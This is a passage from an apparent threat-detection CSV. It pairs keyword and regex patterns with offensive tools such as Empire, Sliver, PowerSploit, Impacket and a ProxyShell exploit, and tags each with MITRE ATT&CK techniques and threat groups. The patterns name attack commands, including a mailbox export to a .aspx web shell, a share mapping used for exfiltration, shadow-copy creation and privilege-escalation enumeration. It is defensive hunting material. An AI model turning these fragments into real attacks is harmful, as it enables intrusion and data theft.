TA0011","N/A","N/A","Sniffing & Spoofing","https://packages.debian.org/fr/sid/netsniff-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netstat -tnlp || ss -tnlp*",".{0,1000}netstat\s\-tnlp\s\|\|\sss\s\-tnlp.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*netstat -unlp || ss -unlp*",".{0,1000}netstat\s\-unlp\s\|\|\sss\s\-unlp.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*nettitude/ETWHash*",".{0,1000}nettitude\/ETWHash.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*nettitude/MalSCCM*",".{0,1000}nettitude\/MalSCCM.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*netuser_enum*",".{0,1000}netuser_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*netview.py*",".{0,1000}netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*netview_enum*",".{0,1000}netview_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*network2john.lua*",".{0,1000}network2john\.lua.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*networking\dhcp_dns_update_utils.py*",".{0,1000}networking\\dhcp_dns_update_utils\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*NetworkMiner*",".{0,1000}NetworkMiner.{0,1000}","offensive_tool_keyword","NetworkMiner","A Network Forensic Analysis Tool (NFAT)","T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","http://www.netresec.com/?page=NetworkMiner","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*New credentials found for user * on *",".{0,1000}New\scredentials\sfound\sfor\suser\s.{0,1000}\son\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*new session to 127.0.0.1:3000*",".{0,1000}new\ssession\sto\s127\.0\.0\.1\:3000.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*NewAdminAccountCreation.ps1*",".{0,1000}NewAdminAccountCreation\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*NewConsole creates the sliver client (and console)*",".{0,1000}NewConsole\screates\sthe\ssliver\sclient\s\(and\sconsole\).{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*New-ElevatedPersistenceOption*",".{0,1000}New\-ElevatedPersistenceOption.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-ElevatedPersistenceOption*",".{0,1000}New\-ElevatedPersistenceOption.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*New-HoneyHash*",".{0,1000}New\-HoneyHash.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","New-HoneyHash.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-HoneyHash.ps1*",".{0,1000}New\-HoneyHash\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-InMemoryModule -ModuleName Win32*",".{0,1000}New\-InMemoryModule\s\-ModuleName\sWin32.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-InMemoryModule*",".{0,1000}New\-InMemoryModule.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-InMemoryModule*",".{0,1000}New\-InMemoryModule.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-MailBoxExportRequest -Mailbox *@* -FilePath *.aspx*",".{0,1000}New\-MailBoxExportRequest\s\-Mailbox\s.{0,1000}\@.{0,1000}\s\-FilePath\s.{0,1000}\.aspx.{0,1000}","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*New-Object System.Management.ManagementClass(""\\\$env:computername\root\cimv2*[""__CLASS""] = ""PMEClass""*",".{0,1000}New\-Object\sSystem\.Management\.ManagementClass\(\""\\\\\\\$env\:computername\\root\\cimv2.{0,1000}\[\""__CLASS\""\]\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*new-operator --name * --lhost *",".{0,1000}new\-operator\s\-\-name\s.{0,1000}\s\-\-lhost\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*New-PacketSMB2IoctlRequest*",".{0,1000}New\-PacketSMB2IoctlRequest.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*New-PSAmsiScanner -*",".{0,1000}New\-PSAmsiScanner\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*New-PSDrive -Name T -PSProvider FileSystem -Root \\$IP\transfer *",".{0,1000}New\-PSDrive\s\-Name\sT\s\-PSProvider\sFileSystem\s\-Root\s\\\\\$IP\\transfer\s.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*New-RoutingPacket*",".{0,1000}New\-RoutingPacket.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-UserPersistenceOption*",".{0,1000}New\-UserPersistenceOption.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*New-UserPersistenceOption*",".{0,1000}New\-UserPersistenceOption.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*New-VolumeShadowCopy*",".{0,1000}New\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*New-WmiSession.ps1*",".{0,1000}New\-WmiSession\.ps1.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Nexpose*",".{0,1000}Nexpose.{0,1000}","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://www.rapid7.com/products/nexpose/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nextnet.exe*",".{0,1000}nextnet\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*NextronSystems*",".{0,1000}NextronSystems.{0,1000}","offensive_tool_keyword","Github Username","Author of APT simulator","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/NextronSystems","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 